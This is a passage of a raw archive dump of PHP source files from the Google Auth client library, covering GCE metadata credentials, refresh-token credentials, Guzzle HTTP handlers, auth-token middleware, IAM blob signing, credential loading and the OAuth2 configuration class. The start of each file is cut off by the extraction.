(!$this->isOnGce) { return ''; } $this->clientName = $this->getFromMetadata( $httpHandler, self::getClientNameUri($this->serviceAccountIdentity) ); return $this->clientName; } /** * Fetch the default Project ID from compute engine. * * Returns null if called outside GCE. * * @param callable $httpHandler Callback which delivers psr7 request * @return string|null */ public function getProjectId(callable $httpHandler = null) { if ($this->projectId) { return $this->projectId; } $httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = true; } if (!$this->isOnGce) { return null; } $this->projectId = $this->getFromMetadata($httpHandler, self::getProjectIdUri()); return $this->projectId; } /** * Fetch the default universe domain from the metadata server. * * @param callable $httpHandler Callback which delivers psr7 request * @return string */ public function getUniverseDomain(callable $httpHandler = null): string { if (null !== $this->universeDomain) { return $this->universeDomain; } $httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); if (!$this->hasCheckedOnGce) { $this->isOnGce = self::onGce($httpHandler); $this->hasCheckedOnGce = true; } try { $this->universeDomain = $this->getFromMetadata( $httpHandler, self::getUniverseDomainUri() ); } catch (ClientException $e) { // If the metadata server exists, but returns a 404 for the universe domain, the auth // libraries should safely assume this is an older metadata server running in GCU, and // should return the default universe domain. if (!$e->hasResponse() || 404 != $e->getResponse()->getStatusCode()) { throw $e; } $this->universeDomain = self::DEFAULT_UNIVERSE_DOMAIN; } // We expect in some cases the metadata server will return an empty string for the universe // domain. In this case, the auth library MUST return the default universe domain. if ('' === $this->universeDomain) { $this->universeDomain = self::DEFAULT_UNIVERSE_DOMAIN; } return $this->universeDomain; } /** * Fetch the value of a GCE metadata server URI. * * @param callable $httpHandler An HTTP Handler to deliver PSR7 requests. * @param string $uri The metadata URI. * @return string */ private function getFromMetadata(callable $httpHandler, $uri) { $resp = $httpHandler( new Request( 'GET', $uri, [self::FLAVOR_HEADER => 'Google'] ) ); return (string) $resp->getBody(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Set whether or not we've already checked the GCE environment. * * @param bool $isOnGce * * @return void */ public function setIsOnGce($isOnGce) { // Implicitly set hasCheckedGce to true $this->hasCheckedOnGce = true; // Set isOnGce $this->isOnGce = $isOnGce; } } google-api/vendor/google/auth/src/Credentials/UserRefreshCredentials.php000064400000010577147600400120022455 0ustar00 $jsonKey JSON credential file path or JSON credentials * as an associative array */ public function __construct( $scope, $jsonKey ) { if (is_string($jsonKey)) { if (!file_exists($jsonKey)) { throw new \InvalidArgumentException('file does not exist'); } $json = file_get_contents($jsonKey); if (!$jsonKey = json_decode((string) $json, true)) { throw new \LogicException('invalid json for auth config'); } } if (!array_key_exists('client_id', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the client_id field' ); } if (!array_key_exists('client_secret', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the client_secret field' ); } if (!array_key_exists('refresh_token', $jsonKey)) { throw new \InvalidArgumentException( 'json key is missing the refresh_token field' ); } $this->auth = new OAuth2([ 'clientId' => $jsonKey['client_id'], 'clientSecret' => $jsonKey['client_secret'], 'refresh_token' => $jsonKey['refresh_token'], 'scope' => $scope, 'tokenCredentialUri' => self::TOKEN_CREDENTIAL_URI, ]); if (array_key_exists('quota_project_id', $jsonKey)) { $this->quotaProject = (string) $jsonKey['quota_project_id']; } } /** * @param callable $httpHandler * * @return array { * A set of auth related metadata, containing the following * * @type string $access_token * @type int $expires_in * @type string $scope * @type string $token_type * @type string $id_token * } */ public function fetchAuthToken(callable $httpHandler = null) { return $this->auth->fetchAuthToken($httpHandler); } /** * @return string */ public function getCacheKey() { return $this->auth->getClientId() . ':' . $this->auth->getCacheKey(); } /** * @return array */ public function getLastReceivedToken() { return $this->auth->getLastReceivedToken(); } /** * Get the quota project used for this API request * * @return string|null */ public function getQuotaProject() { return $this->quotaProject; } /** * Get the granted scopes (if they exist) for the last fetched token. * * @return string|null */ public function getGrantedScope() { return $this->auth->getGrantedScope(); } } google-api/vendor/google/auth/src/HttpHandler/Guzzle6HttpHandler.php000064400000003362147600400120021520 0ustar00client = $client; } /** * Accepts a PSR-7 request and an array of options and returns a PSR-7 response. * * @param RequestInterface $request * @param array $options * @return ResponseInterface */ public function __invoke(RequestInterface $request, array $options = []) { return $this->client->send($request, $options); } /** * Accepts a PSR-7 request and an array of options and returns a PromiseInterface * * @param RequestInterface $request * @param array $options * * @return \GuzzleHttp\Promise\PromiseInterface */ public function async(RequestInterface $request, array $options = []) { return $this->client->sendAsync($request, $options); } } google-api/vendor/google/auth/src/HttpHandler/Guzzle7HttpHandler.php000064400000001266147600400120021522 0ustar00remove('http_errors'); $stack->unshift(Middleware::httpErrors($bodySummarizer), 'http_errors'); } $client = new Client(['handler' => $stack]); } $version = null; if (defined('GuzzleHttp\ClientInterface::MAJOR_VERSION')) { $version = ClientInterface::MAJOR_VERSION; } elseif (defined('GuzzleHttp\ClientInterface::VERSION')) { $version = (int) substr(ClientInterface::VERSION, 0, 1); } switch ($version) { case 6: return new Guzzle6HttpHandler($client); case 7: return new Guzzle7HttpHandler($client); default: throw new \Exception('Version not supported'); } } } google-api/vendor/google/auth/src/Middleware/AuthTokenMiddleware.php000064400000012325147600400120021553 0ustar00' */ class AuthTokenMiddleware { /** * @var callable */ private $httpHandler; /** * It must be an implementation of FetchAuthTokenInterface. * It may also implement UpdateMetadataInterface allowing direct * retrieval of auth related headers * @var FetchAuthTokenInterface */ private $fetcher; /** * @var ?callable */ private $tokenCallback; /** * Creates a new AuthTokenMiddleware. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param callable $httpHandler (optional) callback which delivers psr7 request * @param callable $tokenCallback (optional) function to be called when a new token is fetched. */ public function __construct( FetchAuthTokenInterface $fetcher, callable $httpHandler = null, callable $tokenCallback = null ) { $this->fetcher = $fetcher; $this->httpHandler = $httpHandler; $this->tokenCallback = $tokenCallback; } /** * Updates the request with an Authorization header when auth is 'google_auth'. * * use Google\Auth\Middleware\AuthTokenMiddleware; * use Google\Auth\OAuth2; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $config = [...]; * $oauth2 = new OAuth2($config) * $middleware = new AuthTokenMiddleware($oauth2); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (RequestInterface $request, array $options) use ($handler) { // Requests using "auth"="google_auth" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'google_auth') { return $handler($request, $options); } $request = $this->addAuthHeaders($request); if ($quotaProject = $this->getQuotaProject()) { $request = $request->withHeader( GetQuotaProjectInterface::X_GOOG_USER_PROJECT_HEADER, $quotaProject ); } return $handler($request, $options); }; } /** * Adds auth related headers to the request. * * @param RequestInterface $request * @return RequestInterface */ private function addAuthHeaders(RequestInterface $request) { if (!$this->fetcher instanceof UpdateMetadataInterface || ($this->fetcher instanceof FetchAuthTokenCache && !$this->fetcher->getFetcher() instanceof UpdateMetadataInterface) ) { $token = $this->fetcher->fetchAuthToken(); $request = $request->withHeader( 'authorization', 'Bearer ' . ($token['access_token'] ?? $token['id_token'] ?? '') ); } else { $headers = $this->fetcher->updateMetadata($request->getHeaders(), null, $this->httpHandler); $request = Utils::modifyRequest($request, ['set_headers' => $headers]); } if ($this->tokenCallback && ($token = $this->fetcher->getLastReceivedToken())) { if (array_key_exists('access_token', $token)) { call_user_func($this->tokenCallback, $this->fetcher->getCacheKey(), $token['access_token']); } } return $request; } /** * @return string|null */ private function getQuotaProject() { if ($this->fetcher instanceof GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } } google-api/vendor/google/auth/src/Middleware/ProxyAuthTokenMiddleware.php000064400000011211147600400120022606 0ustar00' */ class ProxyAuthTokenMiddleware { /** * @var callable */ private $httpHandler; /** * @var FetchAuthTokenInterface */ private $fetcher; /** * @var ?callable */ private $tokenCallback; /** * Creates a new ProxyAuthTokenMiddleware. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param callable $httpHandler (optional) callback which delivers psr7 request * @param callable $tokenCallback (optional) function to be called when a new token is fetched. */ public function __construct( FetchAuthTokenInterface $fetcher, callable $httpHandler = null, callable $tokenCallback = null ) { $this->fetcher = $fetcher; $this->httpHandler = $httpHandler; $this->tokenCallback = $tokenCallback; } /** * Updates the request with an Authorization header when auth is 'google_auth'. * * use Google\Auth\Middleware\ProxyAuthTokenMiddleware; * use Google\Auth\OAuth2; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $config = [...]; * $oauth2 = new OAuth2($config) * $middleware = new ProxyAuthTokenMiddleware($oauth2); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'proxy_auth' => 'google_auth' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (RequestInterface $request, array $options) use ($handler) { // Requests using "proxy_auth"="google_auth" will be authorized. if (!isset($options['proxy_auth']) || $options['proxy_auth'] !== 'google_auth') { return $handler($request, $options); } $request = $request->withHeader('proxy-authorization', 'Bearer ' . $this->fetchToken()); if ($quotaProject = $this->getQuotaProject()) { $request = $request->withHeader( GetQuotaProjectInterface::X_GOOG_USER_PROJECT_HEADER, $quotaProject ); } return $handler($request, $options); }; } /** * Call fetcher to fetch the token. * * @return string|null */ private function fetchToken() { $auth_tokens = $this->fetcher->fetchAuthToken($this->httpHandler); if (array_key_exists('access_token', $auth_tokens)) { // notify the callback if applicable if ($this->tokenCallback) { call_user_func( $this->tokenCallback, $this->fetcher->getCacheKey(), $auth_tokens['access_token'] ); } return $auth_tokens['access_token']; } if (array_key_exists('id_token', $auth_tokens)) { return $auth_tokens['id_token']; } return null; } /** * @return string|null; */ private function getQuotaProject() { if ($this->fetcher instanceof GetQuotaProjectInterface) { return $this->fetcher->getQuotaProject(); } return null; } } google-api/vendor/google/auth/src/Middleware/SimpleMiddleware.php000064400000005445147600400120021107 0ustar00 */ private $config; /** * Create a new Simple plugin. * * The configuration array expects one option * - key: required, otherwise InvalidArgumentException is thrown * * @param array $config Configuration array */ public function __construct(array $config) { if (!isset($config['key'])) { throw new \InvalidArgumentException('requires a key to have been set'); } $this->config = array_merge(['key' => null], $config); } /** * Updates the request query with the developer key if auth is set to simple. * * use Google\Auth\Middleware\SimpleMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $my_key = 'is not the same as yours'; * $middleware = new SimpleMiddleware(['key' => $my_key]); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_uri' => 'https://www.googleapis.com/discovery/v1/', * 'auth' => 'simple' * ]); * * $res = $client->get('drive/v2/rest'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (RequestInterface $request, array $options) use ($handler) { // Requests using "auth"="scoped" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'simple') { return $handler($request, $options); } $query = Query::parse($request->getUri()->getQuery()); $params = array_merge($query, $this->config); $uri = $request->getUri()->withQuery(Query::build($params)); $request = $request->withUri($uri); return $handler($request, $options); }; } } google-api/vendor/google/auth/src/Middleware/ScopedAccessTokenMiddleware.php000064400000011543147600400120023212 0ustar00' */ class ScopedAccessTokenMiddleware { use CacheTrait; const DEFAULT_CACHE_LIFETIME = 1500; /** * @var callable */ private $tokenFunc; /** * @var array|string */ private $scopes; /** * Creates a new ScopedAccessTokenMiddleware. * * @param callable $tokenFunc a token generator function * @param array|string $scopes the token authentication scopes * @param array $cacheConfig configuration for the cache when it's present * @param CacheItemPoolInterface $cache an implementation of CacheItemPoolInterface */ public function __construct( callable $tokenFunc, $scopes, array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $this->tokenFunc = $tokenFunc; if (!(is_string($scopes) || is_array($scopes))) { throw new \InvalidArgumentException( 'wants scope should be string or array' ); } $this->scopes = $scopes; if (!is_null($cache)) { $this->cache = $cache; $this->cacheConfig = array_merge([ 'lifetime' => self::DEFAULT_CACHE_LIFETIME, 'prefix' => '', ], $cacheConfig); } } /** * Updates the request with an Authorization header when auth is 'scoped'. * * E.g this could be used to authenticate using the AppEngine * AppIdentityService. * * use google\appengine\api\app_identity\AppIdentityService; * use Google\Auth\Middleware\ScopedAccessTokenMiddleware; * use GuzzleHttp\Client; * use GuzzleHttp\HandlerStack; * * $scope = 'https://www.googleapis.com/auth/taskqueue' * $middleware = new ScopedAccessTokenMiddleware( * 'AppIdentityService::getAccessToken', * $scope, * [ 'prefix' => 'Google\Auth\ScopedAccessToken::' ], * $cache = new Memcache() * ); * $stack = HandlerStack::create(); * $stack->push($middleware); * * $client = new Client([ * 'handler' => $stack, * 'base_url' => 'https://www.googleapis.com/taskqueue/v1beta2/projects/', * 'auth' => 'scoped' // authorize all requests * ]); * * $res = $client->get('myproject/taskqueues/myqueue'); * * @param callable $handler * @return \Closure */ public function __invoke(callable $handler) { return function (RequestInterface $request, array $options) use ($handler) { // Requests using "auth"="scoped" will be authorized. if (!isset($options['auth']) || $options['auth'] !== 'scoped') { return $handler($request, $options); } $request = $request->withHeader('authorization', 'Bearer ' . $this->fetchToken()); return $handler($request, $options); }; } /** * @return string */ private function getCacheKey() { $key = null; if (is_string($this->scopes)) { $key .= $this->scopes; } elseif (is_array($this->scopes)) { $key .= implode(':', $this->scopes); } return $key; } /** * Determine if token is available in the cache, if not call tokenFunc to * fetch it. * * @return string */ private function fetchToken() { $cacheKey = $this->getCacheKey(); $cached = $this->getCachedValue($cacheKey); if (!empty($cached)) { return $cached; } $token = call_user_func($this->tokenFunc, $this->scopes); $this->setCachedValue($cacheKey, $token); return $token; } } google-api/vendor/google/auth/src/Iam.php000064400000006117147600400120014306 0ustar00httpHandler = $httpHandler ?: HttpHandlerFactory::build(HttpClientCache::getHttpClient()); } /** * Sign a string using the IAM signBlob API. * * Note that signing using IAM requires your service account to have the * `iam.serviceAccounts.signBlob` permission, part of the "Service Account * Token Creator" IAM role. * * @param string $email The service account email. * @param string $accessToken An access token from the service account. * @param string $stringToSign The string to be signed. * @param array $delegates [optional] A list of service account emails to * add to the delegate chain. If omitted, the value of `$email` will * be used. * @return string The signed string, base64-encoded. */ public function signBlob($email, $accessToken, $stringToSign, array $delegates = []) { $httpHandler = $this->httpHandler; $name = sprintf(self::SERVICE_ACCOUNT_NAME, $email); $uri = self::IAM_API_ROOT . '/' . sprintf(self::SIGN_BLOB_PATH, $name); if ($delegates) { foreach ($delegates as &$delegate) { $delegate = sprintf(self::SERVICE_ACCOUNT_NAME, $delegate); } } else { $delegates = [$name]; } $body = [ 'delegates' => $delegates, 'payload' => base64_encode($stringToSign), ]; $headers = [ 'Authorization' => 'Bearer ' . $accessToken ]; $request = new Psr7\Request( 'POST', $uri, $headers, Utils::streamFor(json_encode($body)) ); $res = $httpHandler($request); $body = json_decode((string) $res->getBody(), true); return $body['signedBlob']; } } google-api/vendor/google/auth/src/CredentialsLoader.php000064400000022737147600400120017172 0ustar00|null JSON key | null */ public static function fromEnv() { $path = getenv(self::ENV_VAR); if (empty($path)) { return null; } if (!file_exists($path)) { $cause = 'file ' . $path . ' does not exist'; throw new \DomainException(self::unableToReadEnv($cause)); } $jsonKey = file_get_contents($path); return json_decode((string) $jsonKey, true); } /** * Load a JSON key from a well known path. * * The well known path is OS dependent: * * * windows: %APPDATA%/gcloud/application_default_credentials.json * * others: $HOME/.config/gcloud/application_default_credentials.json * * If the file does not exist, this returns null. * * @return array|null JSON key | null */ public static function fromWellKnownFile() { $rootEnv = self::isOnWindows() ? 'APPDATA' : 'HOME'; $path = [getenv($rootEnv)]; if (!self::isOnWindows()) { $path[] = self::NON_WINDOWS_WELL_KNOWN_PATH_BASE; } $path[] = self::WELL_KNOWN_PATH; $path = implode(DIRECTORY_SEPARATOR, $path); if (!file_exists($path)) { return null; } $jsonKey = file_get_contents($path); return json_decode((string) $jsonKey, true); } /** * Create a new Credentials instance. * * @param string|string[] $scope the scope of the access request, expressed * either as an Array or as a space-delimited String. * @param array $jsonKey the JSON credentials. * @param string|string[] $defaultScope The default scope to use if no * user-defined scopes exist, expressed either as an Array or as a * space-delimited string. * * @return ServiceAccountCredentials|UserRefreshCredentials|ImpersonatedServiceAccountCredentials|ExternalAccountCredentials */ public static function makeCredentials( $scope, array $jsonKey, $defaultScope = null ) { if (!array_key_exists('type', $jsonKey)) { throw new \InvalidArgumentException('json key is missing the type field'); } if ($jsonKey['type'] == 'service_account') { // Do not pass $defaultScope to ServiceAccountCredentials return new ServiceAccountCredentials($scope, $jsonKey); } if ($jsonKey['type'] == 'authorized_user') { $anyScope = $scope ?: $defaultScope; return new UserRefreshCredentials($anyScope, $jsonKey); } if ($jsonKey['type'] == 'impersonated_service_account') { $anyScope = $scope ?: $defaultScope; return new ImpersonatedServiceAccountCredentials($anyScope, $jsonKey); } if ($jsonKey['type'] == 'external_account') { $anyScope = $scope ?: $defaultScope; return new ExternalAccountCredentials($anyScope, $jsonKey); } throw new \InvalidArgumentException('invalid value in the type field'); } /** * Create an authorized HTTP Client from an instance of FetchAuthTokenInterface. * * @param FetchAuthTokenInterface $fetcher is used to fetch the auth token * @param array $httpClientOptions (optional) Array of request options to apply. * @param callable $httpHandler (optional) http client to fetch the token. * @param callable $tokenCallback (optional) function to be called when a new token is fetched. * @return \GuzzleHttp\Client */ public static function makeHttpClient( FetchAuthTokenInterface $fetcher, array $httpClientOptions = [], callable $httpHandler = null, callable $tokenCallback = null ) { $middleware = new Middleware\AuthTokenMiddleware( $fetcher, $httpHandler, $tokenCallback ); $stack = \GuzzleHttp\HandlerStack::create(); $stack->push($middleware); return new \GuzzleHttp\Client([ 'handler' => $stack, 'auth' => 'google_auth', ] + $httpClientOptions); } /** * Create a new instance of InsecureCredentials. * * @return InsecureCredentials */ public static function makeInsecureCredentials() { return new InsecureCredentials(); } /** * Fetch a quota project from the environment variable * GOOGLE_CLOUD_QUOTA_PROJECT. Return null if * GOOGLE_CLOUD_QUOTA_PROJECT is not specified. * * @return string|null */ public static function quotaProjectFromEnv() { return getenv(self::QUOTA_PROJECT_ENV_VAR) ?: null; } /** * Gets a callable which returns the default device certification. * * @throws UnexpectedValueException * @return callable|null */ public static function getDefaultClientCertSource() { if (!$clientCertSourceJson = self::loadDefaultClientCertSourceFile()) { return null; } $clientCertSourceCmd = $clientCertSourceJson['cert_provider_command']; return function () use ($clientCertSourceCmd) { $cmd = array_map('escapeshellarg', $clientCertSourceCmd); exec(implode(' ', $cmd), $output, $returnVar); if (0 === $returnVar) { return implode(PHP_EOL, $output); } throw new RuntimeException( '"cert_provider_command" failed with a nonzero exit code' ); }; } /** * Determines whether or not the default device certificate should be loaded. * * @return bool */ public static function shouldLoadClientCertSource() { return filter_var(getenv(self::MTLS_CERT_ENV_VAR), FILTER_VALIDATE_BOOLEAN); } /** * @return array{cert_provider_command:string[]}|null */ private static function loadDefaultClientCertSourceFile() { $rootEnv = self::isOnWindows() ? 'APPDATA' : 'HOME'; $path = sprintf('%s/%s', getenv($rootEnv), self::MTLS_WELL_KNOWN_PATH); if (!file_exists($path)) { return null; } $jsonKey = file_get_contents($path); $clientCertSourceJson = json_decode((string) $jsonKey, true); if (!$clientCertSourceJson) { throw new UnexpectedValueException('Invalid client cert source JSON'); } if (!isset($clientCertSourceJson['cert_provider_command'])) { throw new UnexpectedValueException( 'cert source requires "cert_provider_command"' ); } if (!is_array($clientCertSourceJson['cert_provider_command'])) { throw new UnexpectedValueException( 'cert source expects "cert_provider_command" to be an array' ); } return $clientCertSourceJson; } /** * Get the universe domain from the credential. Defaults to "googleapis.com" * for all credential types which do not support universe domain. * * @return string */ public function getUniverseDomain(): string { return self::DEFAULT_UNIVERSE_DOMAIN; } } google-api/vendor/google/auth/src/GCECache.php000064400000004471147600400120015123 0ustar00 $cacheConfig Configuration for the cache * @param CacheItemPoolInterface $cache */ public function __construct( array $cacheConfig = null, CacheItemPoolInterface $cache = null ) { $this->cache = $cache; $this->cacheConfig = array_merge([ 'lifetime' => 1500, 'prefix' => '', ], (array) $cacheConfig); } /** * Caches the result of onGce so the metadata server is not called multiple * times. * * @param callable $httpHandler callback which delivers psr7 request * @return bool True if this a GCEInstance, false otherwise */ public function onGce(callable $httpHandler = null) { if (is_null($this->cache)) { return GCECredentials::onGce($httpHandler); } $cacheKey = self::GCE_CACHE_KEY; $onGce = $this->getCachedValue($cacheKey); if (is_null($onGce)) { $onGce = GCECredentials::onGce($httpHandler); $this->setCachedValue($cacheKey, $onGce); } return $onGce; } } google-api/vendor/google/auth/src/ServiceAccountSignerTrait.php000064400000003466147600400120020675 0ustar00auth->getSigningKey(); $signedString = ''; if (class_exists('\\phpseclib\\Crypt\\RSA') && !$forceOpenssl) { $rsa = new RSA(); $rsa->loadKey($privateKey); $rsa->setSignatureMode(RSA::SIGNATURE_PKCS1); $rsa->setHash('sha256'); $signedString = $rsa->sign($stringToSign); } elseif (extension_loaded('openssl')) { openssl_sign($stringToSign, $signedString, $privateKey, 'sha256WithRSAEncryption'); } else { // @codeCoverageIgnoreStart throw new \RuntimeException('OpenSSL is not installed.'); } // @codeCoverageIgnoreEnd return base64_encode($signedString); } } google-api/vendor/google/auth/src/GetQuotaProjectInterface.php000064400000001663147600400120020502 0ustar00 */ private $cacheConfig; /** * @var ?CacheItemPoolInterface */ private $cache; /** * Gets the cached value if it is present in the cache when that is * available. * * @param mixed $k * * @return mixed */ private function getCachedValue($k) { if (is_null($this->cache)) { return null; } $key = $this->getFullCacheKey($k); if (is_null($key)) { return null; } $cacheItem = $this->cache->getItem($key); if ($cacheItem->isHit()) { return $cacheItem->get(); } } /** * Saves the value in the cache when that is available. * * @param mixed $k * @param mixed $v * @return mixed */ private function setCachedValue($k, $v) { if (is_null($this->cache)) { return null; } $key = $this->getFullCacheKey($k); if (is_null($key)) { return null; } $cacheItem = $this->cache->getItem($key); $cacheItem->set($v); $cacheItem->expiresAfter($this->cacheConfig['lifetime']); return $this->cache->save($cacheItem); } /** * @param null|string $key * @return null|string */ private function getFullCacheKey($key) { if (is_null($key)) { return null; } $key = $this->cacheConfig['prefix'] . $key; // ensure we do not have illegal characters $key = preg_replace('|[^a-zA-Z0-9_\.!]|', '', $key); // Hash keys if they exceed $maxKeyLength (defaults to 64) if ($this->maxKeyLength && strlen($key) > $this->maxKeyLength) { $key = substr(hash('sha256', $key), 0, $this->maxKeyLength); } return $key; } } google-api/vendor/google/auth/src/GetUniverseDomainInterface.php000064400000002075147600400120021010 0ustar00 */ public static $knownSigningAlgorithms = [ 'HS256', 'HS512', 'HS384', 'RS256', ]; /** * The well known grant types. * * @var array */ public static $knownGrantTypes = [ 'authorization_code', 'refresh_token', 'password', 'client_credentials', ]; /** * - authorizationUri * The authorization server's HTTP endpoint capable of * authenticating the end-user and obtaining authorization. * * @var ?UriInterface */ private $authorizationUri; /** * - tokenCredentialUri * The authorization server's HTTP endpoint capable of issuing * tokens and refreshing expired tokens. * * @var UriInterface */ private $tokenCredentialUri; /** * The redirection URI used in the initial request. * * @var ?string */ private $redirectUri; /** * A unique identifier issued to the client to identify itself to the * authorization server. * * @var string */ private $clientId; /** * A shared symmetric secret issued by the authorization server, which is * used to authenticate the client. * * @var string */ private $clientSecret; /** * The resource owner's username. * * @var ?string */ private $username; /** * The resource owner's password. * * @var ?string */ private $password; /** * The scope of the access request, expressed either as an Array or as a * space-delimited string. * * @var ?array */ private $scope; /** * An arbitrary string designed to allow the client to maintain state. * * @var string */ private $state; /** * The authorization code issued to this client. * * Only used by the authorization code access grant type. * * @var ?string */ private $code; /** * The issuer ID when using assertion profile. * * @var ?string */ private $issuer; /** * The target audience for assertions. * * @var string */ private $audience; /** * The target sub when issuing assertions. * * @var string */ private $sub; /** * The number of seconds assertions are valid for. * * @var int */ private $expiry; /** * The signing key when using assertion profile. * * @var ?string */ private $signingKey; /** * The signing key id when using assertion profile. Param kid in jwt header * * @var string */ private $signingKeyId; /** * The signing algorithm when using an assertion profile. * * @var ?string */ private $signingAlgorithm; /** * The refresh token associated with the access token to be refreshed. * * @var ?string */ private $refreshToken; /** * The current access token. * * @var string */ private $accessToken; /** * The current ID token. * * @var string */ private $idToken; /** * The scopes granted to the current access token * * @var string */ private $grantedScope; /** * The lifetime in seconds of the current access token. * * @var ?int */ private $expiresIn; /** * The expiration time of the access token as a number of seconds since the * unix epoch. * * @var ?int */ private $expiresAt; /** * The issue time of the access token as a number of seconds since the unix * epoch. * * @var ?int */ private $issuedAt; /** * The current grant type. * * @var ?string */ private $grantType; /** * When using an extension grant type, this is the set of parameters used by * that extension. * * @var array */ private $extensionParams; /** * When using the toJwt function, these claims will be added to the JWT * payload. * * @var array */ private $additionalClaims; /** * The code verifier for PKCE for OAuth 2.0. When set, the authorization * URI will contain the Code Challenge and Code Challenge Method querystring * parameters, and the token URI will contain the Code Verifier parameter. * * @see https://datatracker.ietf.org/doc/html/rfc7636 * @var ?string */ private $codeVerifier; /** * For STS requests. * A URI that indicates the target service or resource where the client * intends to use the requested security token. */ private ?string $resource; /** * For STS requests. * A fetcher for the "subject_token", which is a security token that * represents the identity of the party on behalf of whom the request is * being made. */ private ?ExternalAccountCredentialSourceInterface $subjectTokenFetcher; /** * For STS requests. * An identifier, that indicates the type of the security token in the * subjectToken parameter. */ private ?string $subjectTokenType; /** * For STS requests. * A security token that represents the identity of the acting party. */ private ?string $actorToken; /** * For STS requests. * An identifier that indicates the type of the security token in the * actorToken parameter. */ private ?string $actorTokenType; /** * From STS response. * An identifier for the representation of the issued security token. */ private ?string $issuedTokenType = null; /** * Create a new OAuthCredentials. * * The configuration array accepts various options * * - authorizationUri * The authorization server's HTTP endpoint capable of * authenticating the end-user and obtaining authorization. * * - tokenCredentialUri * The authorization server's HTTP endpoint capable of issuing * tokens and refreshing expired tokens. * * - clientId * A unique identifier issued to the client to identify itself to the * authorization server. * * - clientSecret * A shared symmetric secret issued by the authorization server, * which is used to authenticate the client. * * - scope * The scope of the access request, expressed either as an Array * or as a space-delimited String. * * - state * An arbitrary string designed to allow the client to maintain state. * * - redirectUri * The redirection URI used in the initial request. * * - username * The resource owner's username. * * - password * The resource owner's password. * * - issuer * Issuer ID when using assertion profile * * - audience * Target audience for assertions * * - expiry * Number of seconds assertions are valid for * * - signingKey * Signing key when using assertion profile * * - signingKeyId * Signing key id when using assertion profile * * - refreshToken * The refresh token associated with the access token * to be refreshed. * * - accessToken * The current access token for this client. * * - idToken * The current ID token for this client. * * - extensionParams * When using an extension grant type, this is the set of parameters used * by that extension. * * - codeVerifier * The code verifier for PKCE for OAuth 2.0. * * - resource * The target service or resource where the client ntends to use the * requested security token. * * - subjectTokenFetcher * A fetcher for the "subject_token", which is a security token that * represents the identity of the party on behalf of whom the request is * being made. * * - subjectTokenType * An identifier that indicates the type of the security token in the * subjectToken parameter. * * - actorToken * A security token that represents the identity of the acting party. * * - actorTokenType * An identifier for the representation of the issued security token. * * @param array $config Configuration array */ public function __construct(array $config) { $opts = array_merge([ 'expiry' => self::DEFAULT_EXPIRY_SECONDS, 'extensionParams' => [], 'authorizationUri' => null, 'redirectUri' => null, 'tokenCredentialUri' => null, 'state' => null, 'username' => null, 'password' => null, 'clientId' => null, 'clientSecret' => null, 'issuer' => null, 'sub' => null, 'audience' => null, 'signingKey' => null, 'signingKeyId' => null, 'signingAlgorithm' => null, 'scope' => null, 'additionalClaims' => [], 'codeVerifier' => null, 'resource' => null, 'subjectTokenFetcher' => null, 'subjectTokenType' => null, 'actorToken' => null, 'actorTokenType' => null, ], $config); $this->setAuthorizationUri($opts['authorizationUri']); $this->setRedirectUri($opts['redirectUri']); $this->setTokenCredentialUri($opts['tokenCredentialUri']); $this->setState($opts['state']); $this->setUsername($opts['username']); $this->setPassword($opts['password']); $this->setClientId($opts['clientId']); $this->setClientSecret($opts['clientSecret']); $this->setIssuer($opts['issuer']); $this->setSub($opts['sub']); $this->setExpiry($opts['expiry']); $this->setAudience($opts['audience']); $this->setSigningKey($opts['signingKey']); $this->setSigningKeyId($opts['signingKeyId']); $this->setSigningAlgorithm($opts['signingAlgorithm']); $this->setScope($opts['scope']); $this->setExtensionParams($opts['extensionParams']); $this->setAdditionalClaims($opts['additionalClaims']); $this->setCodeVerifier($opts['codeVerifier']); // for STS $this->resource = $opts['resource']; $this->subjectTokenFetcher = $opts['subjectTokenFetcher']; $this->subjectTokenType = $opts['subjectTokenType']; $this->actorToken = $opts['actorToken']; $this->actorTokenType = $opts['actorTokenType']; $this->updateToken($opts); } /** * Verifies the idToken if present. * * - if none is present, return null * - if present, but invalid, raises DomainException. * - otherwise returns the payload in the idtoken as a PHP object. * * The behavior of this method varies depending on the version of * `firebase/php-jwt` you are using. In versions 6.0 and above, you cannot * provide multiple $allowed_algs, and instead must provide an array of Key * objects as the $publicKey. * * @param string|Key|Key[] $publicKey The public key to use to authenticate the token * @param string|array $allowed_algs algorithm or array of supported verification algorithms. * Providing more than one algorithm will throw an exception. * @throws \DomainException if the token is missing an audience. * @throws \DomainException if the audience does not match the one set in * the OAuth2 class instance. * @throws \UnexpectedValueException If the token is invalid * @throws \InvalidArgumentException If more than one value for allowed_algs is supplied * @throws \Firebase\JWT\SignatureInvalidException If the signature is invalid. * @throws \Firebase\JWT\BeforeValidException If the token is not yet valid. * @throws \Firebase\JWT\ExpiredException If the token has expired. * @return null|object */ public function 